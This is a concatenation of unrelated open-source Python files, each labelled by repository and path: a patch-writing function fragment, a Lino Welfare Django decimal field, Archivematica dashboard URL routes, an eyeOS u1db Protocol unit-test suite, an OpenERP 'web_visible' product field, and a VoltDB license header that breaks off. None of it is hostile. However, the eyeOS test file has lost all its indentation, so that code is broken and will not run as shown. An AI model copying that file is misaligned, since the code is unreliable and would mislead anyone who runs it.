            diff = file_diff_dict[filename]
            # Remove the old file when it is deleted or renamed away.
            if diff.delete or diff.rename:
                if isfile(pre_patch_filename):
                    remove(pre_patch_filename)
            # Unless deleted, write the patched content to its (new) name.
            if not diff.delete:
                new_filename = (diff.rename
                                if diff.rename is not False
                                else filename)
                with open(new_filename, mode='w', encoding='utf-8') as file:
                    file.writelines(diff.modified)

        return file_diff_dict
|
khchine5/lino-welfare
|
lino_welfare/modlib/debts/fields.py
|
# -*- coding: UTF-8 -*-
# Copyright 2012-2015 Luc Saffre
# This file is part of Lino Welfare.
#
# Lino Welfare is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# Lino Welfare is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public
# License along with Lino Welfare. If not, see
# <http://www.gnu.org/licenses/>.
"""
Database fields for `lino_welfare.modlib.debts`.
"""
from __future__ import unicode_literals
from django.db import models
from lino.api import _
class PeriodsField(models.DecimalField):
    """
    Used for `Entry.periods` and `Account.periods`
    (the latter holds simply the default value for the former).
    It means: for how many months the entered amount counts.
    Default value is 1. For yearly amounts set it to 12.
    """

    def __init__(self, *args, **kwargs):
        # Field defaults; explicit kwargs passed by the caller win.
        defaults = dict(
            blank=True,
            default=1,
            help_text=_("""\
For how many months the entered amount counts.
For example 1 means a monthly amount, 12 a yearly amount."""),
            #~ max_length=3,
            max_digits=3,
            decimal_places=0,
        )
        defaults.update(kwargs)
        super(PeriodsField, self).__init__(*args, **defaults)
#~ class PeriodsField(models.IntegerField):
#~ """
#~ Used for `Entry.periods` and `Account.periods`
#~ (which holds simply the default value for the former).
#~ It means: for how many months the entered amount counts.
#~ Default value is 1. For yearly amounts set it to 12.
#~ """
#~ def __init__(self, *args, **kwargs):
#~ defaults = dict(
#~ max_length=3,
# max_digits=3,
#~ blank=True,
#~ null=True
#~ )
#~ defaults.update(kwargs)
#~ super(PeriodsField, self).__init__(*args, **defaults)
|
artefactual/archivematica-history
|
src/dashboard/src/main/urls.py
|
from django.conf.urls.defaults import *
from django.conf import settings
from django.views.generic.simple import direct_to_template, redirect_to
# Matches a canonical UUID: 8-4-4-4-12 groups of word characters.
# NOTE(review): not a raw string -- '\w' happens to survive as-is, but r'...'
# would be safer if this pattern is ever edited.
UUID_REGEX = '[\w]{8}(-[\w]{4}){3}-[\w]{12}'

# View names below are resolved relative to the 'main.views' prefix.
urlpatterns = patterns('main.views',

    # Index
    (r'^$', 'home'),

    # Forbidden
    (r'forbidden/$', 'forbidden'),

    # Transfer
    (r'transfer/$', 'transfer_grid'),
    (r'transfer/(?P<uuid>' + UUID_REGEX + ')/$', 'transfer_detail'),
    (r'transfer/(?P<uuid>' + UUID_REGEX + ')/delete/$', 'transfer_delete'),
    (r'transfer/(?P<uuid>' + UUID_REGEX + ')/microservices/$', 'transfer_microservices'),
    (r'transfer/(?P<uuid>' + UUID_REGEX + ')/rights/$', 'transfer_rights_list'),
    (r'transfer/(?P<uuid>' + UUID_REGEX + ')/rights/add/$', 'transfer_rights_edit'),
    (r'transfer/(?P<uuid>' + UUID_REGEX + ')/rights/(?P<id>\d+)/$', 'transfer_rights_edit'),
    (r'transfer/(?P<uuid>' + UUID_REGEX + ')/rights/delete/(?P<id>\d+)/$', 'transfer_rights_delete'),
    (r'transfer/(?P<uuid>' + UUID_REGEX + ')/rights/grants/(?P<id>\d+)/$', 'transfer_rights_grants_edit'),
    (r'transfer/status/$', 'transfer_status'),
    (r'transfer/status/(?P<uuid>' + UUID_REGEX + ')/$', 'transfer_status'),
    (r'transfer/select/(?P<source_directory_id>\d+)/$', 'transfer_select'),
    (r'transfer/browser/$', 'transfer_browser'),

    # Ingest
    (r'ingest/$', 'ingest_grid'),
    (r'ingest/(?P<uuid>' + UUID_REGEX + ')/$', 'ingest_detail'),
    (r'ingest/(?P<uuid>' + UUID_REGEX + ')/delete/$', 'ingest_delete'),
    (r'ingest/(?P<uuid>' + UUID_REGEX + ')/metadata/$', 'ingest_metadata_list'),
    (r'ingest/(?P<uuid>' + UUID_REGEX + ')/metadata/add/$', 'ingest_metadata_edit'),
    (r'ingest/(?P<uuid>' + UUID_REGEX + ')/metadata/(?P<id>\d+)/$', 'ingest_metadata_edit'),
    (r'ingest/(?P<uuid>' + UUID_REGEX + ')/metadata/delete/(?P<id>\d+)/$', 'ingest_metadata_delete'),
    (r'ingest/(?P<uuid>' + UUID_REGEX + ')/microservices/$', 'ingest_microservices'),
    (r'ingest/(?P<uuid>' + UUID_REGEX + ')/rights/$', 'ingest_rights_list'),
    (r'ingest/(?P<uuid>' + UUID_REGEX + ')/rights/add/$', 'ingest_rights_edit'),
    (r'ingest/(?P<uuid>' + UUID_REGEX + ')/rights/(?P<id>\d+)/$', 'ingest_rights_edit'),
    (r'ingest/(?P<uuid>' + UUID_REGEX + ')/rights/delete/(?P<id>\d+)/$', 'ingest_rights_delete'),
    (r'ingest/(?P<uuid>' + UUID_REGEX + ')/rights/grants/(?P<id>\d+)/$', 'ingest_rights_grants_edit'),
    (r'ingest/(?P<uuid>' + UUID_REGEX + ')/upload/$', 'ingest_upload'),
    (r'ingest/status/$', 'ingest_status'),
    (r'ingest/status/(?P<uuid>' + UUID_REGEX + ')/$', 'ingest_status'),
    (r'ingest/normalization-report/(?P<uuid>' + UUID_REGEX + ')/$', 'ingest_normalization_report'),
    (r'ingest/preview/aip/(?P<jobuuid>' + UUID_REGEX + ')/$', 'ingest_browse_aip'),
    (r'ingest/preview/normalization/(?P<jobuuid>' + UUID_REGEX + ')/$', 'ingest_browse_normalization'),

    # Jobs and tasks (is part of ingest)
    (r'jobs/(?P<uuid>' + UUID_REGEX + ')/explore/$', 'jobs_explore'),
    (r'jobs/(?P<uuid>' + UUID_REGEX + ')/list-objects/$', 'jobs_list_objects'),
    (r'tasks/(?P<uuid>' + UUID_REGEX + ')/$', 'tasks'),
    (r'task/(?P<uuid>' + UUID_REGEX + ')/$', 'task'),

    # Access
    (r'access/$', 'access_list'),
    (r'access/(?P<id>\d+)/delete/$', 'access_delete'),

    # Lookup
    (r'lookup/rightsholder/(?P<id>\d+)/$', 'rights_holders_lookup'),

    # Autocomplete
    (r'autocomplete/rightsholders$', 'rights_holders_autocomplete'),

    # Administration
    (r'administration/$', 'administration'),
    #(r'administration/edit/(?P<id>\d+)/$', 'administration_edit'),
    (r'administration/dip/$', 'administration_dip'),
    (r'administration/dip/edit/(?P<id>\d+)/$', 'administration_dip_edit'),
    (r'administration/dips/atom/$', 'administration_atom_dips'),
    (r'administration/dips/contentdm/$', 'administration_contentdm_dips'),
    (r'administration/sources/$', 'administration_sources'),
    (r'administration/sources/delete/json/(?P<id>\d+)/$', 'administration_sources_delete_json'),
    (r'administration/processing/$', 'administration_processing'),
    (r'administration/sources/json/$', 'administration_sources_json'),
    # Disabled until further development can be done
    #(r'administration/search/$', 'administration_search'),
    #(r'administration/search/flush/aips/$', 'administration_search_flush_aips'),

    # JSON feeds
    (r'status/$', 'status'),
    (r'formdata/(?P<type>\w+)/(?P<parent_id>\d+)/(?P<delete_id>\d+)/$', 'formdata_delete'),
    (r'formdata/(?P<type>\w+)/(?P<parent_id>\d+)/$', 'formdata'),
)
# Filesystem related JSON views
# View names below are resolved relative to the 'main.filesystem' prefix.
urlpatterns += patterns('main.filesystem',
    (r'filesystem/download/$', 'download'),
    (r'filesystem/contents/$', 'contents'),
    (r'filesystem/children/$', 'directory_children'),
    (r'filesystem/delete/$', 'delete'),
    (r'filesystem/copy_to_originals/$', 'copy_to_originals'),
    (r'filesystem/copy_to_arrange/$', 'copy_to_arrange'),
    (r'filesystem/copy_transfer_component/$', 'copy_transfer_component'),
    (r'filesystem/get_temp_directory/$', 'get_temp_directory'),
    # NOTE(review): 'ransfer' looks like a truncated path (cf. the other
    # transfer URLs); the URL is an external interface, so confirm no client
    # depends on it before renaming.
    (r'filesystem/ransfer/$', 'copy_to_start_transfer'),
    (r'filesystem/copy_from_arrange/$', 'copy_from_arrange_to_completed')
)
|
cloudspaces/eyeos-u1db
|
eyeos/extern/u1db/ProtocolTest.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'root'
import unittest
from mock import Mock
from Protocol import Protocol
import json
import os
from settings import settings
class ProtocolTest (unittest.TestCase):
def setUp(self):
self.protocol = Protocol(True)
def tearDown(self):
os.remove("test.u1db")
os.remove("test1.u1db")
"""
method: protocol
when: called
with: typeInsertAndList
should: insertCorrect
"""
def test_protocol_called_typeInsertAndList_insertCorrect(self):
if settings[ 'NEW_CODE' ] == "true":
params = '{"type":"insert","lista":[{"cloud":"Stacksync", "user_eyeos":"eyeID_EyeosUser_2","status": "NEW", "is_root": false, "version": 1, "filename": "clients", "parent_id": "null", "server_modified": "2013-03-08 10:36:41.997", "path": "/documents/clients", "client_modified": "2013-03-08 10:36:41.997", "id": 9873615, "user": "eyeos","is_folder":true}]}'
else:
params = '{"type":"insert","lista":[{"user_eyeos":"eyeID_EyeosUser_2","status": "NEW", "is_root": false, "version": 1, "filename": "clients", "parent_id": "null", "server_modified": "2013-03-08 10:36:41.997", "path": "/documents/clients", "client_modified": "2013-03-08 10:36:41.997", "id": 9873615, "user": "eyeos","is_folder":true}]}'
aux = json.loads(params)
self.protocol.insert = Mock()
self.protocol.insert.return_value = True
result = self.protocol.protocol(params)
self.protocol.insert.assert_called_once_with(aux['lista'])
self.assertEquals('true',result)
"""
method: protocol
when: called
with: typeSelectAndList
should: returnArray
"""
def test_protocol_called_typeSelectAndList_returnArray(self):
if settings[ 'NEW_CODE' ] == "true":
params = '{"type":"select","lista":[{"id":"124568", "user_eyeos":"eyeID_EyeosUser_2", "cloud":"Stacksync", "path":"/documents/clients"}]}'
else:
params = '{"type":"select","lista":[{"id":"124568", "user_eyeos":"eyeID_EyeosUser_2", "path":"/documents/clients"}]}'
aux = json.loads(params)
self.protocol.select = Mock()
self.protocol.select.return_value = []
result = self.protocol.protocol(params)
self.protocol.select.assert_called_once_with(aux['lista'][0])
self.assertEquals('[]',result)
"""
method: protocol
when: called
with: typeUpdateAndList
should: updateCorrect
"""
def test_protocol_called_typeUpdateAndList_updateCorrect(self):
if settings[ 'NEW_CODE' ] == "true":
params = '{"type":"update","lista":[{"parent_old":"null"},{"cloud": "Stacksync", "user_eyeos": "eyeID_EyeosUser_2", "status": "NEW", "is_root": false, "version": 1, "filename": "clients", "parent_id": "null", "server_modified": "2013-03-08 10:36:41.997", "path": "/documents/clients", "client_modified": "2013-03-08 10:36:41.997", "id": "9873615", "user": "eyeos","is_folder":true}]}'
else:
params = '{"type":"update","lista":[{"parent_old":"null"},{"user_eyeos":"eyeID_EyeosUser_2","status": "NEW", "is_root": false, "version": 1, "filename": "clients", "parent_id": "null", "server_modified": "2013-03-08 10:36:41.997", "path": "/documents/clients", "client_modified": "2013-03-08 10:36:41.997", "id": "9873615", "user": "eyeos","is_folder":true}]}'
aux = json.loads(params)
self.protocol.update = Mock()
self.protocol.update.return_value = True
result = self.protocol.protocol(params)
self.protocol.update.assert_called_once_with(aux['lista'])
self.assertEquals('true',result)
"""
method: protocol
when: called
with: typeDeleteAndList
should: deleteCorrect
"""
def test_protocol_called_typeDeleteAndList_deleteCorrect(self):
if settings[ 'NEW_CODE' ] == "true":
params = '{"type":"delete","lista":[{"id":1234, "user_eyeos":"eyeID_EyeosUser_2", "cloud": "Stacksync", "parent_id":"3456"},{"id":"8907", "user_eyeos":"eyeID_EyeosUser_2", "cloud": "Stacksync", "parent_id":"3456"}]}'
else:
params = '{"type":"delete","lista":[{"id":1234,"user_eyeos":"eyeID_EyeosUser_2","parent_id":"3456"},{"id":"8907","user_eyeos":"eyeID_EyeosUser_2","parent_id":"3456"}]}'
aux = json.loads(params)
self.protocol.delete = Mock()
self.protocol.delete.return_value = True
result = self.protocol.protocol(params)
self.protocol.delete.assert_called_once_with(aux['lista'])
self.assertEquals('true',result)
"""
method: protocol
when: called
with: typeGetParentAndPath
should: returnArray
"""
def test_protocol_called_typeGetParentAndList_returnArray(self):
if settings[ 'NEW_CODE' ] == "true":
params = '{"type":"parent", "lista":[{"cloud": "Stacksync", "path":"/Documents/", "filename":"prueba", "user_eyeos":"eyeID_EyeosUser_2"}]}'
else:
params = '{"type":"parent", "lista":[{"path":"/Documents/", "filename":"prueba", "user_eyeos":"eyeID_EyeosUser_2"}]}'
aux = json.loads(params)
self.protocol.getParent = Mock()
self.protocol.getParent.return_value = []
result = self.protocol.protocol(params)
self.protocol.getParent.assert_called_once_with(aux[ 'lista' ][0])
self.assertEquals('[]',result)
"""
method: protocol
when: called
with: typeDeleteFolderAndList
should: deleteCorrect
"""
def test_protocol_called_typeDeleteFolderAndList_deleteCorrect(self):
if settings[ 'NEW_CODE' ] == "true":
params = '{"type":"deleteFolder","lista":[{"id":"1234","user_eyeos":"eyeID_EyeosUser_2", "cloud":"Stacksync", "path":"/documents/clients"}]}'
else:
params = '{"type":"deleteFolder","lista":[{"id":"1234","user_eyeos":"eyeID_EyeosUser_2","path":"/documents/clients"}]}'
aux = json.loads(params)
self.protocol.deleteFolder = Mock()
self.protocol.deleteFolder.return_value = True
result = self.protocol.protocol(params)
self.protocol.deleteFolder.assert_called_once_with(aux[ 'lista' ][0])
self.assertEquals('true',result)
"""
method: protocol
when: called
with: typeDeleteMetadataUserAndListUser
should: deleteCorrect
"""
def test_protocol_called_typeDeleteMetadataUserAndListUser_deleteCorrect(self):
params = '{"type":"deleteMetadataUser","lista":[{"user_eyeos":"eyeID_EyeosUser_2"}]}'
self.protocol.deleteMetadataUser = Mock()
self.protocol.deleteMetadataUser.return_value = True
result = self.protocol.protocol(params)
self.protocol.deleteMetadataUser.assert_called_once_with(json.loads(params)['lista'])
self.assertEquals('true',result)
"""
method: protocol
when: called
with: typeDeleteMetadataUserAndListUserAndCloud
should: deleteCorrect
"""
def test_protocol_called_typeDeleteMetadataUserAndListUserAndCloud_deleteCorrect(self):
params = '{"type":"deleteMetadataUser","lista":[{"user_eyeos":"eyeID_EyeosUser_2", "cloud":"Stacksync"}]}'
self.protocol.deleteMetadataUser = Mock()
self.protocol.deleteMetadataUser.return_value = True
result = self.protocol.protocol(params)
self.protocol.deleteMetadataUser.assert_called_once_with(json.loads(params)['lista'])
self.assertEquals('true',result)
"""
method: protocol
when: called
with: typeSelectMetatadataUserAndList
should: returnArray
"""
def test_protocol_called_typeSelectMetadataUserAndList_returnArray(self):
params = '{"type":"selectMetadataUser","lista":[{"user_eyeos":"eyeID_EyeosUser_2"}]}'
self.protocol.selectMetadataUser = Mock()
self.protocol.selectMetadataUser.return_value = []
result = self.protocol.protocol(params)
self.protocol.selectMetadataUser.assert_called_once_with("eyeID_EyeosUser_2")
self.assertEquals('[]',result)
"""
method: protocol
when: called
with: typeRenameMetadataAndUserAndList
"""
def test_protocol_called_typeRenameMetadataAndUserAndList_renameCorrect(self):
if settings[ 'NEW_CODE' ] == "true":
params = '{"type": "rename", "lista": [{"user_eyeos": "eyeID_EyeosUser_2", "cloud": "Stacksync", "status": "NEW", "version": 1, "filename": "prueba.txt", "parent_id": "null", "server_modified": "2013-03-08 10:36:41.997", "path": "/", "client_modified": "2013-03-08 10:36:41.997", "id": "9873615", "user": "eyeos","is_folder":false}]}'
else:
params = '{"type": "rename", "lista": [{"user_eyeos": "eyeID_EyeosUser_2", "status": "NEW", "version": 1, "filename": "prueba.txt", "parent_id": "null", "server_modified": "2013-03-08 10:36:41.997", "path": "/", "client_modified": "2013-03-08 10:36:41.997", "id": "9873615", "user": "eyeos","is_folder":false}]}'
aux = json.loads(params)
self.protocol.renameMetadata = Mock()
self.protocol.renameMetadata.return_value = True
result = self.protocol.protocol(params)
self.protocol.renameMetadata.assert_called_once_with(aux[ 'lista' ][0])
self.assertEquals('true',result)
"""
##################################################################################################################################################
TEST DOWNLOAD FILES
##################################################################################################################################################
"""
"""
method: protocol
when: called
with: typeInsertDownloadVersionAndList
should: insertCorrect
"""
def test_protocol_called_typeInsertDownloadVersionAndList_insertCorrect(self):
if settings[ 'NEW_CODE' ] == "true":
params = '{"type": "insertDownloadVersion", "lista": [{"id": "9873615", "cloud": "Stacksync", "user_eyeos": "eyeID_EyeosUser_2", "version": "2", "recover": false}]}'
else:
params = '{"type": "insertDownloadVersion", "lista": [{"id": "9873615", "user_eyeos": "eyeID_EyeosUser_2", "version": "2", "recover": false}]}'
aux = json.loads(params)
self.protocol.insertDownloadVersion = Mock()
self.protocol.insertDownloadVersion.return_value = True
result = self.protocol.protocol(params)
self.protocol.insertDownloadVersion.assert_called_once_with(aux[ 'lista' ][0])
self.assertEquals('true',result)
"""
method: protocol
when: called
with: typeUpdateDownloadVersionAndList
should: updateCorrect
"""
def test_protocol_called_typeUpdateDownloadVersionAndList_updateCorrect(self):
if settings[ 'NEW_CODE' ] == "true":
params = '{"type": "updateDownloadVersion", "lista": [{"id": "9873615", "cloud": "Stacksync", "user_eyeos": "eyeID_EyeosUser_2", "version": "3", "recover": false}]}'
else:
params = '{"type": "updateDownloadVersion", "lista": [{"id": "9873615", "user_eyeos": "eyeID_EyeosUser_2", "version": "3", "recover": false}]}'
aux = json.loads(params)
self.protocol.updateDownloadVersion = Mock()
self.protocol.updateDownloadVersion.return_value = True
result = self.protocol.protocol(params)
self.protocol.updateDownloadVersion.assert_called_once_with(aux[ 'lista' ][0])
self.assertEquals('true',result)
"""
method: protocol
when: called
with: typeDeleteDownloadVersionAndList
should: deleteCorrect
"""
def test_protocol_called_typeDeleteDownloadVersionAndList_deleteCorrect(self):
params = '{"type":"deleteDownloadVersion","lista":[{"id":"9873615","user_eyeos":"eyeID_EyeosUser_2"}]}'
self.protocol.deleteDownloadVersion = Mock()
self.protocol.deleteDownloadVersion.return_value = True
result = self.protocol.protocol(params)
self.protocol.deleteDownloadVersion.assert_called_once_with("9873615","eyeID_EyeosUser_2")
self.assertEquals('true',result)
"""
method: protocol
when: called
with: typeGetDownloadVersionAndList
should: returnMetadata
"""
def test_protocol_called_typeGetDownloadVersionAndList_returnMetadata(self):
if settings[ 'NEW_CODE' ] == "true":
params = '{"type":"getDownloadVersion","lista":[{"id": "9873615", "user_eyeos": "eyeID_EyeosUser_2", "cloud": "Stacksync"}]}'
expected = {"id": "9873615", "cloud": "Stacksync", "user_eyeos": "eyeID_EyeosUser_2", "version": "3", "recover": False}
else:
params = '{"type":"getDownloadVersion","lista":[{"id": "9873615", "user_eyeos": "eyeID_EyeosUser_2"}]}'
expected = {"id": "9873615", "user_eyeos": "eyeID_EyeosUser_2", "version": "3", "recover": False}
aux = json.loads(params)
self.protocol.getDownloadVersion = Mock()
self.protocol.getDownloadVersion.return_value = expected
result = self.protocol.protocol(params)
self.protocol.getDownloadVersion.assert_called_once_with(aux[ 'lista' ][0])
self.assertEquals(json.dumps(expected), result)
"""
method: protocol
when: called
with: typeRecursiveDeleteVersionAndList
should: deleteCorrect
"""
def test_protocol_called_typeRecursiveDeleteVersionAndList_deleteCorrect(self):
if settings[ 'NEW_CODE' ] == "true":
params = '{"type":"recursiveDeleteVersion","lista":[{"cloud":"Stacksync","id":"9873615","user_eyeos":"eyeID_EyeosUser_2"}]}'
else:
params = '{"type":"recursiveDeleteVersion","lista":[{"id":"9873615","user_eyeos":"eyeID_EyeosUser_2"}]}'
aux = json.loads(params)
self.protocol.recursiveDeleteVersion = Mock()
self.protocol.recursiveDeleteVersion.return_value = True
result = self.protocol.protocol(params)
self.protocol.recursiveDeleteVersion.assert_called_once_with(aux['lista'][0])
self.assertEquals('true',result)
"""
##################################################################################################################################################
TEST CALENDAR
##################################################################################################################################################
"""
"""
method: protocol
when: called
with: typeDeleteEventAndList
should: deleteCorrect
"""
def test_protocol_called_typeDeleteEventAndList_deleteCorrect(self):
params = '{"type":"deleteEvent" , "lista":[{"type":"event","user_eyeos": "eyeos","calendar": "personal", "status":"DELETED" ,"isallday":"0", "timestart": "201419160000", "timeend":"201419170000", "repetition": "None", "finaltype": "1", "finalvalue": "0", "subject": "Visita Médico", "location": "Barcelona", "description": "Llevar justificante"},{"type":"event","user_eyeos": "eyeos","calendarid": "eyeID_Calendar_2b", "isallday": "1", "timestart": "201420160000", "timeend":"201420170000", "repetition": "None", "finaltype": "1", "finalvalue": "0", "subject": "Excursión", "location": "Girona", "description": "Mochila"}]}'
aux = json.loads(params)
self.protocol.deleteEvent = Mock()
self.protocol.deleteEvent.return_value = True
result = self.protocol.protocol(params)
self.protocol.deleteEvent.assert_called_once_with(aux['lista'])
self.assertEquals("true",result)
"""
method: protocol
when: called
with: typeUpdateEventAndList
should: updateCorrect
"""
def test_protocol_called_typeUpdateEventAndList_updateCorrect(self):
params = '{"type":"updateEvent" , "lista":[{"type":"event","user_eyeos": "eyeos","calendar": "personal", "status":"CHANGED", "isallday":"0", "timestart": "201419160000", "timeend":"201419170000", "repetition": "None", "finaltype": "1", "finalvalue": "0", "subject": "Visita Médico", "location": "Barcelona", "description": "Llevar justificante"},{"type":"event","user_eyeos": "eyeos","calendarid": "eyeID_Calendar_2b", "isallday": "1", "timestart": "201420160000", "timeend":"201420170000", "repetition": "None", "finaltype": "1", "finalvalue": "0", "subject": "Excursión", "location": "Girona", "description": "Mochila"}]}'
aux = json.loads(params)
self.protocol.updateEvent = Mock()
self.protocol.updateEvent.return_value = True
result = self.protocol.protocol(params)
self.protocol.updateEvent.assert_called_once_with(aux['lista'])
self.assertEquals("true",result)
"""
method: protocol
when: called
with: typeSelectEventAndList
should: return Array
"""
def test_protocol_called_typeSelectEventAndList_returnArray(self):
params = '{"type":"selectEvent","lista":[{"type":"event","user_eyeos":"eyeos","calendar":"personal"}]}'
aux = json.loads(params)
self.protocol.selectEvent = Mock()
self.protocol.selectEvent.return_value = []
result = self.protocol.protocol(params)
self.protocol.selectEvent.assert_called_once_with("event","eyeos","personal")
self.assertEquals("[]",result)
"""
method: protocol
when: called
with: typeInsertEventAndList
should: insertCorrect
"""
def test_protocol_called_typeInsertEventAndList_insertCorrect(self):
params = '{"type":"insertEvent" , "lista":[{"type":"event","user_eyeos": "eyeos","calendar": "personal", "status":"NEW", "isallday":"0", "timestart": "201419160000", "timeend":"201419170000", "repetition": "None", "finaltype": "1", "finalvalue": "0", "subject": "Visita Médico", "location": "Barcelona", "description": "Llevar justificante"},{"type":"event","user_eyeos": "eyeos","calendarid": "eyeID_Calendar_2b", "isallday": "1", "timestart": "201420160000", "timeend":"201420170000", "repetition": "None", "finaltype": "1", "finalvalue": "0", "subject": "Excursión", "location": "Girona", "description": "Mochila"}]}'
aux = json.loads(params)
self.protocol.insertEvent = Mock()
self.protocol.insertEvent.return_value = True
result = self.protocol.protocol(params)
self.protocol.insertEvent.assert_called_once_with(aux['lista'])
self.assertEquals("true",result)
"""
method: protocol
when: called
with: typeInsertCalendarAndList
should: insertCorrect
"""
def test_protocol_called_typeInsertCalendarAndList_insertCorrect(self):
params = '{"type":"insertCalendar" , "lista":[{"type":"calendar","user_eyeos": "eyeos","name": "personal", "status":"NEW","description":"personal calendar","timezone":0}]}'
aux = json.loads(params)
self.protocol.insertCalendar = Mock()
self.protocol.insertCalendar.return_value = True
result = self.protocol.protocol(params)
self.protocol.insertCalendar.assert_called_once_with(aux['lista'])
self.assertEquals("true",result)
"""
method: protocol
when: called
with: typeDeleteCalendarAndList
should: deleteCorrect
"""
def test_protocol_called_typeDeleteCalendarAndList_deleteCorrect(self):
params = '{"type":"deleteCalendar" , "lista":[{"type":"calendar","user_eyeos": "eyeos","name": "personal"}]}'
aux = json.loads(params)
self.protocol.deleteCalendar = Mock()
self.protocol.deleteCalendar.return_value = True
result = self.protocol.protocol(params)
self.protocol.deleteCalendar.assert_called_once_with(aux['lista'])
self.assertEquals("true",result)
"""
method: protocol
when: called
with: typeSelectCalendarAndList
should: returnArray
"""
def test_protocol_called_typeSelectCalendarAndList_returnArray(self):
params = '{"type":"selectCalendar" , "lista":[{"type":"calendar","user_eyeos": "eyeos"}]}'
aux = json.loads(params)
self.protocol.selectCalendar = Mock()
self.protocol.selectCalendar.return_value = []
result = self.protocol.protocol(params)
self.protocol.selectCalendar.assert_called_once_with(aux['lista'][0])
self.assertEquals("[]",result)
"""
method: protocol
when: called
with: typeUpdateCalendarAndList
should: updateCorrect
"""
def test_protocol_called_typeUpdateCalendarAndList_updateCorrect(self):
params = '{"type":"updateCalendar" , "lista":[{"type":"calendar","user_eyeos": "eyeos","name":"personal","description":"personal calendar","timezone":0,"status":"CHANGED"}]}'
aux = json.loads(params)
self.protocol.updateCalendar = Mock()
self.protocol.updateCalendar.return_value = True
result = self.protocol.protocol(params)
self.protocol.updateCalendar.assert_called_once_with(aux['lista'])
self.assertEquals("true",result)
"""
method: protocol
when: called
with: typeDeleteCalendarUserAndList
should: deleteCorrect
"""
def test_protocol_called_typeDeleteCalendarUserAndList_deleteCorrect(self):
params = '{"type":"deleteCalendarUser","lista":[{"user_eyeos":"eyeos"}]}'
self.protocol.deleteCalendarUser = Mock()
self.protocol.deleteCalendarUser.return_value = True
result = self.protocol.protocol(params)
self.protocol.deleteCalendarUser.assert_called_once_with("eyeos")
self.assertEquals('true',result)
"""
method: protocol
when: called
with: selectCalendarsAndEventsAndList
should: returnArray
"""
def test_protocol_called_selectCalendarsAndEventsAndList_returnArray(self):
params = '{"type":"selectCalendarsAndEvents","lista":[{"user_eyeos":"eyeos"}]}'
self.protocol.selectCalendarsAndEvents = Mock()
self.protocol.selectCalendarsAndEvents.return_value = []
result = self.protocol.protocol(params)
self.protocol.selectCalendarsAndEvents.assert_called_once_with("eyeos")
self.assertEquals('[]',result)
"""
##################################################################################################################################################
TEST LOCK FILE
##################################################################################################################################################
"""
"""
method: protocol
when: called
with: typeGetMetadataFileAndList
should: returnArray
"""
def test_protocol_called_typeGetMetadataFileAndList_returnArray(self):
params = '{"type":"getMetadataFile","lista":[{"id":"124568","cloud":"Stacksync"}]}'
self.protocol.getMetadataFile = Mock()
self.protocol.getMetadataFile.return_value = []
result = self.protocol.protocol(params)
self.protocol.getMetadataFile.assert_called_once_with("124568","Stacksync")
self.assertEquals('[]',result)
"""
method: protocol
when: called
with: typeLockFileAndList
should: correctBlock
"""
def test_protocol_called_typeLockFileAndList_returnCorrectBlock(self):
params = '{"type":"lockFile","lista":[{"id":"124568","cloud":"Stacksync","username":"eyeos","IpServer":"192.168.56.101","datetime":"2015-05-12 10:50:00","status":"open","timeLimit":10}]}'
aux = json.loads(params)
self.protocol.lockFile = Mock()
self.protocol.lockFile.return_value = True
result = self.protocol.protocol(params)
self.protocol.lockFile.assert_called_once_with(aux['lista'][0])
self.assertEquals('true',result)
"""
method: protocol
when: called
with: typeUpdateDateTimeAndList
should: updateCorrect
"""
def test_protocol_called_typeUpdateDateTimeAndList_returnCorrectBlock(self):
params = '{"type":"updateDateTime","lista":[{"id":"124568","cloud":"Stacksync","username":"eyeos","IpServer":"192.168.56.101","datetime":"2015-05-12 10:50:00","status":"open"}]}'
aux = json.loads(params)
self.protocol.updateDateTime = Mock()
self.protocol.updateDateTime.return_value = True
result = self.protocol.protocol(params)
self.protocol.updateDateTime.assert_called_once_with(aux['lista'][0])
self.assertEquals('true',result)
"""
method: protocol
when: called
with: typeUnLockFileAndList
should: returnCorrectUnBlock
"""
def test_protocol_called_typeUnLockFileAndList_returnCorrectUnBlock(self):
params = '{"type":"unLockFile","lista":[{"id":"124568","cloud":"Stacksync","username":"eyeos","IpServer":"192.168.56.101","datetime":"2015-05-12 10:50:00","status":"close"}]}'
aux = json.loads(params)
self.protocol.unLockFile = Mock()
self.protocol.unLockFile.return_value = True
result = self.protocol.protocol(params)
self.protocol.unLockFile.assert_called_once_with(aux['lista'][0])
self.assertEquals('true',result)
|
codeback/openerp-cbk_product_web_visible
|
product.py
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# res_partner
# Copyright (c) 2013 Codeback Software S.L. (http://codeback.es)
# @author: Miguel García <miguel@codeback.es>
# @author: Javier Fuentes <javier@codeback.es>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from osv import fields, osv
from datetime import datetime, timedelta
from openerp.tools.translate import _
class product_product(osv.osv):
    """Extend product.product with a flag controlling visibility on the web shop."""
    _name = "product.product"
    # _inherit == _name: extend the existing model in place rather than create a new one
    _inherit = "product.product"
    _columns = {
        # Whether the product is shown on the public website
        'web_visible': fields.boolean(string='Web Visible')
    }
|
eoneil1942/voltdb-4.7fix
|
lib/python/voltcli/voltdb.d/create.py
|
# This file is part of VoltDB.
# Copyright (C) 2008-2014 VoltDB Inc.
#
# This file contains original code and/or modifications of original code.
# Any modifications made by VoltDB Inc. are licensed under the following
# terms and conditions:
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
